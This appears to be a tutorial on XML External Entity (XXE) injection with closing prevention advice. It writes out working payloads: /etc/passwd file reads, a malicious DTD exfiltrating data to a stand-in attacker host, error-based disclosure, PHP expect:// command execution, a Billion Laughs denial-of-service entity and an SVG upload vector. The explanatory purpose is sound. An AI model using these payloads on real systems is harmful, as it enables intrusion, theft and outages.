In web development, the Extensible Markup Language (XML) plays a pivotal role for anyone who uses web technologies to distribute information. XML is popular in part because it supports platform-independent data exchange, metadata applications, web publishing, and custom tags. Although XML resembles HTML, the two have different goals: HTML was designed to display data, with an emphasis on its appearance, whereas XML was designed to carry data, with a focus on how the data is described.
An XML External Entity (XXE) injection vulnerability allows an attacker to interfere with an application's processing of XML data. An attacker can often use it to view files on the application server's file system and to interact with any external or back-end systems that the application itself can access. To understand XXE injection, we first need a few basic concepts.
XML is a markup language that lets you create your own tags as needed. It keeps data in a format that can be stored, searched, and shared efficiently. Because the syntax is standardized, a recipient can parse XML data that is shared or transmitted across different systems or platforms, locally or over the internet.
Let’s understand how an XML document is structured.
XML documents consist of element trees. The XML tree begins with a root element and branches from there to child elements. There can be sub-elements within elements.
<root>
<child>
<subchild>.....</subchild>
</child>
</root>
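As a small illustration of the tree structure, the following sketch parses a document of the same shape with Python's standard xml.etree.ElementTree module and prints each element indented by its depth. The helper name walk and the placeholder text inside subchild are assumptions made for this example.

```python
import xml.etree.ElementTree as ET

# Same shape as the tree above; the text content is a placeholder.
doc = "<root><child><subchild>text</subchild></child></root>"


def walk(element, depth=0):
    """Return one line per element, indented two spaces per nesting level."""
    lines = ["  " * depth + element.tag]
    for child in element:
        lines.extend(walk(child, depth + 1))
    return lines


tree_lines = walk(ET.fromstring(doc))
print("\n".join(tree_lines))
# root
#   child
#     subchild
```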
“DTD” stands for Document Type Definition, which defines the structure of an XML document. It lists the legal elements, attributes, and entities and uses them to describe that structure. The DTD is declared within the DOCTYPE declaration.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE body [
<!ENTITY message "This is a sample XML Document.">
]>
<body>
<message> &message; </message>
</body>
This is how the above example is interpreted.
<?xml version="1.0" encoding="UTF-8"?> – the XML declaration. It carries metadata about the document (the XML version and the character encoding). It is not a tag.
DOCTYPE – declares the DTD for the XML document. Here we can declare elements, attributes, entities, and notations.
ENTITY – declares an entity. In the example above, message is the entity name, and the reference &message; is replaced with the entity's value when the document is parsed.
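To see the entity substitution happen, the sketch below parses the sample document with Python's standard xml.etree.ElementTree module, which expands internal entities declared in the document's own DTD. The variable names are chosen for this example only.

```python
import xml.etree.ElementTree as ET

# The sample document from above, passed as bytes so the encoding
# declaration in the first line is honoured by the parser.
doc = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE body [
<!ENTITY message "This is a sample XML Document.">
]>
<body>
<message> &message; </message>
</body>"""

root = ET.fromstring(doc)

# The parser has already replaced &message; with the entity's value.
message_text = root.find("message").text
print(message_text.strip())
```

The application code never sees the reference itself, only the expanded text. This is why entity handling matters so much once entities can point at external resources.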
Elements describe the data. An XML element is a user-defined container that holds text, attributes, and other elements; elements nested inside another element form its content.
Syntax
<element-name attribute1 attribute2>
..content..
</element-name>
Entities represent an item of data in an XML document in place of the data itself, and are often used as shortcuts for special characters or repeated text. Entities can be declared as internal or external. A parameter entity, declared with %, can be referenced only within the DTD.
Syntax (internal entity)
<!ENTITY entity-name "entity-value">
Syntax (external entity)
<!ENTITY entity-name SYSTEM "URI/URL">
Syntax (parameter entity)
<!ENTITY % ename "entity_value">
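The difference between these declarations can be observed without resolving any of them. The following is a minimal sketch using the EntityDeclHandler callback of Python's standard xml.parsers.expat module, which is invoked once per entity declaration. The function name list_entity_declarations and the sample entity names are assumptions made for this example, and the external file is never fetched because nothing references the entity.

```python
import xml.parsers.expat

SAMPLE = b"""<!DOCTYPE foo [
<!ENTITY greeting "hello">
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY % param "value">
]>
<foo/>"""


def list_entity_declarations(document: bytes):
    """Return (name, is_parameter, kind, value_or_uri) for each declaration."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation_name):
        # External entities carry a system identifier instead of a value.
        if system_id is not None:
            found.append((name, bool(is_parameter), "external", system_id))
        else:
            found.append((name, bool(is_parameter), "internal", value))

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return found


declarations = list_entity_declarations(SAMPLE)
for entry in declarations:
    print(entry)
```

A check like this can be useful when auditing stored XML for declarations that point outside the document.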
Some web applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always process the XML data on the server with a standard library or platform API.
The XML specification contains several potentially dangerous features, and standard parsers support them even though applications rarely use them. XXE vulnerabilities arise from this. One such feature is external entities: custom entities whose values are loaded from outside the DTD in which they are declared. An XXE vulnerability arises when an application allows an attacker to interfere with its processing of XML.
To retrieve an arbitrary file through XXE injection, we need to modify the submitted XML in two ways: introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file, and edit a data value that is returned in the application's response so that it references that entity.
Let’s understand better using an example.
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
The application has a stock check feature that sends the XML above to the server to retrieve stock data for a product. The application does not validate user input or otherwise defend against XXE, so by submitting the XML below we can fetch the contents of the /etc/passwd file.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
The XML above defines an external entity called xxe whose value is the contents of the /etc/passwd file. The entity is then referenced within the productId value, which causes the application's response to include the contents of the file.
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
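Whether a payload like this succeeds depends on the parser behind the application. As a hedged sketch of how to check a parser in a test, the code below feeds the same payload to Python's standard xml.etree.ElementTree, which according to the Python documentation does not expand external entities and raises a ParseError when one is referenced. The function name parse_stock_check is hypothetical, and no file is read at any point.

```python
import xml.etree.ElementTree as ET

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>"""

PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""


def parse_stock_check(data: bytes):
    """Return the productId text, or None if the parser rejects the document."""
    try:
        return ET.fromstring(data).findtext("productId")
    except ET.ParseError:
        # ElementTree refuses to resolve the external entity reference.
        return None


print(parse_stock_check(BENIGN))
print(parse_stock_check(PAYLOAD))
```

Other parsers, and other configurations of the same parser, can behave differently, so a test like this only describes the parser it is run against.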
We can detect blind XXE through out-of-band techniques and through error messages, but detection only shows that the vulnerability is present. To exploit it further, we have to exfiltrate sensitive data using different techniques.
In this case, we host a malicious DTD on a system we control and then invoke that external DTD from within our in-band payload. The following DTD exfiltrates the contents of the /etc/passwd file.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
This DTD defines an XML parameter entity called “file”, containing the contents of the /etc/passwd file. It then defines a parameter entity called “eval”, containing a dynamic declaration of another parameter entity called “exfiltrate”. The exfiltrate entity is evaluated by making an HTTP request to the attacker's web server, with the value of the file entity in the URL query string. The DTD then references the eval entity, which performs the dynamic declaration of exfiltrate, and finally references the exfiltrate entity, so that its value is evaluated by requesting the specified URL.
Hosting Malicious DTD:
Now we have to host the malicious DTD on our own web server.
So, for example, our URL will be:
http://web-attacker.com/malicious.dtd
The last step is to submit the XXE payload to the vulnerable web application:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd"> %xxe;]>
This XXE payload declares an XML parameter entity called xxe and then references it within the DTD. This causes the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined in the malicious DTD are then executed, and the contents of the /etc/passwd file are transmitted to the attacker's server.
An alternative way to exploit blind XXE is to trigger an XML parsing error whose error message contains the sensitive data we wish to retrieve.
Note that this works only if the application returns the resulting error message in its response.
We can trigger an XML parsing error message which will contain the contents of the /etc/passwd file, using a malicious external DTD as follows:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
This DTD defines an XML parameter entity called “file”, containing the contents of the /etc/passwd file. It then defines a parameter entity called “eval”, containing a dynamic declaration of another parameter entity called “error”. The error entity is evaluated by loading a nonexistent file whose name contains the value of the file entity. Referencing the eval entity performs the dynamic declaration of error, and referencing the error entity makes the parser attempt to load the nonexistent file. The resulting error message contains the name of that file, which includes the contents of /etc/passwd.
After all these steps, we will see an error message like:
java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
If a PHP application is vulnerable to XXE and has the “expect” extension loaded, it may also be vulnerable to command execution. The extension is designed to let applications run shell commands and interact with them, and it registers the expect:// stream wrapper, which can be used in URIs. We can therefore use it in an XXE attack.
The idea is simple: we provide the URI expect://id as the system identifier of an XML external entity. PHP executes the id command and returns its output in the response.
<?xml version="1.0"?>
<!DOCTYPE hacks [
<!ENTITY cmd SYSTEM "expect://id" >
]>
<secboat>&cmd;</secboat>
Here, the id command is executed on the system and its output is returned inside the secboat tags. This tells the attacker which privileges are available for subsequent file requests or commands.
A Billion Laughs attack is another attack associated with XML parsing. It abuses entity expansion in the DTD.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
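Here each entity expands into ten copies of the previous one, so resolving a single reference forces the parser to build an enormous string. This exhausts memory and CPU time, slows down requests, and causes a denial of service (DoS) on the application.
Now let’s see what this DTD contains.
The single lol9 entity is replaced by 10 lol8 entities, each of which is replaced by 10 lol7 entities, and so on. The entities never refer to themselves; the growth is exponential, not cyclic. After all nine levels are expanded, the document contains one billion copies of the string “lol”, roughly 3 GB of text produced from a payload of under a kilobyte.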
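The size of the expansion follows from simple arithmetic. The sketch below computes it for the DTD shown above; the function name expanded_size is introduced for this example only.

```python
def expanded_size(base_text: str, fan_out: int, levels: int) -> int:
    """Bytes produced when each level repeats the previous one fan_out times."""
    return len(base_text.encode("utf-8")) * fan_out ** levels


# lol1 through lol9 are nine levels, each repeating the previous one 10 times.
copies = 10 ** 9
size_bytes = expanded_size("lol", fan_out=10, levels=9)

print(copies)      # 1000000000
print(size_bytes)  # 3000000000
```

Adding one more level to the DTD would multiply the result by ten again, which is why parsers that defend against this attack typically cap the total amount of entity expansion instead of the nesting depth alone.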
Some applications allow users to upload files that are then processed on the server. Document formats like DOCX and image formats like SVG use XML or contain XML subcomponents. Even if an application expects JPEG or PNG files, the image processing library it uses may still accept SVG files and process them. Since SVG is XML-based, an attacker can submit a malicious SVG image and so reach the XXE attack surface.
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="228px" height="228px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="12" x="0" y="13">
&xxe;
</text>
</svg>
Again, the same format as the other XXE payloads applies here. We add the DOCTYPE declaration, declare the entity, and reference the file that we want to access. Next comes the svg element that defines the image: we set its size and place a text element inside it. The text, however, is the reference to the entity that we declared, &xxe;. When the server processes the file and renders the image, it places the contents of /etc/passwd inside it.
Most POST requests use a default content type generated by HTML forms, such as application/x-www-form-urlencoded. Some websites expect requests in this format but will also process other content types, including XML. If a normal request contains the following:
POST /profile HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

user=1337
and you submit the same request in XML format:
POST /profile HTTP/1.0
Content-Type: text/xml
Content-Length: 59

<?xml version="1.0" encoding="UTF-8"?><userid>1337</userid>
If the server accepts this, then you have found another attack surface for injecting malicious XML.
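When testing for this, the XML body and its headers have to agree. As a minimal sketch, the helper below converts a single-field form body into an XML body and derives the Content-Length from the encoded bytes. The function name form_body_to_xml is hypothetical, and copying the form field name into the element name is an assumption: a real endpoint may expect a different element name, as with userid in the request above.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape


def form_body_to_xml(form_body: str) -> bytes:
    """Convert a one-field urlencoded body such as 'user=1337' to XML bytes."""
    pairs = parse_qsl(form_body, strict_parsing=True)
    if len(pairs) != 1:
        raise ValueError("this sketch only handles a single form field")
    name, value = pairs[0]
    # Escape the value so characters like < and & stay well-formed.
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f"<{name}>{escape(value)}</{name}>"
    )
    return document.encode("utf-8")


body = form_body_to_xml("user=1337")
headers = {
    "Content-Type": "text/xml",
    # Content-Length counts bytes of the encoded body, not characters.
    "Content-Length": str(len(body)),
}
print(headers)
print(body.decode("utf-8"))
```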
Identification and mitigation of XXE require developer training. Furthermore, preventing XXE requires:
As a general rule, XXE attacks can be prevented by disabling the features that make the XML processor vulnerable, in particular DTD processing and external entity resolution. Analyse the XML parsing library the application uses to identify the features that can be misused and disable them; the OWASP XXE Prevention Cheat Sheet lists the relevant settings for common parsers.
Avoid serializing sensitive data, and use less complex data formats such as JSON whenever possible.
Implement positive (whitelisting) server-side input validation, filtering, or sanitization to prevent hostile data from being entered into XML documents, headers, or nodes.
Patch or upgrade all XML processors and libraries used by the application or by the underlying operating system. Use dependency checkers. Updating SOAP to 1.2 or higher is recommended.
For XML file upload functionality, validate the incoming XML with XSD validation or similar. User inputs and URLs must be sanitized, validated, and approved before being uploaded to the server.
For detection, monitoring, and blocking XXE attacks, use virtual patching, API security gateways, Web application firewalls (WAF), and Interactive Application Security Testing (IAST) tools.
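One common way to apply the first measure is to refuse any untrusted document that carries a DOCTYPE at all, since every payload in this article depends on one. The following is a minimal sketch using Python's standard xml.parsers.expat module; the names DoctypeForbidden and assert_no_doctype are hypothetical, and it is one possible pre-parse check, not a complete defence on its own.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def assert_no_doctype(data: bytes) -> None:
    """Parse data and raise DoctypeForbidden as soon as a DOCTYPE starts."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here aborts parsing before any entity is declared or used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


hostile = (
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    b"<stockCheck><productId>&xxe;</productId></stockCheck>"
)

try:
    assert_no_doctype(hostile)
    rejected = False
except DoctypeForbidden:
    rejected = True

print(rejected)
```

Documents that are not well-formed raise xml.parsers.expat.ExpatError instead, so callers would normally treat both exceptions as a rejection. Applications that genuinely need DTDs cannot use this approach and have to disable external entity resolution in the parser instead.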
XXE injection vulnerabilities can be highly destructive if attackers exploit them successfully. Besides degrading application availability, they expose a system to further attacks and to data exfiltration. A strong web application security strategy should include protecting applications from XML external entity vulnerabilities.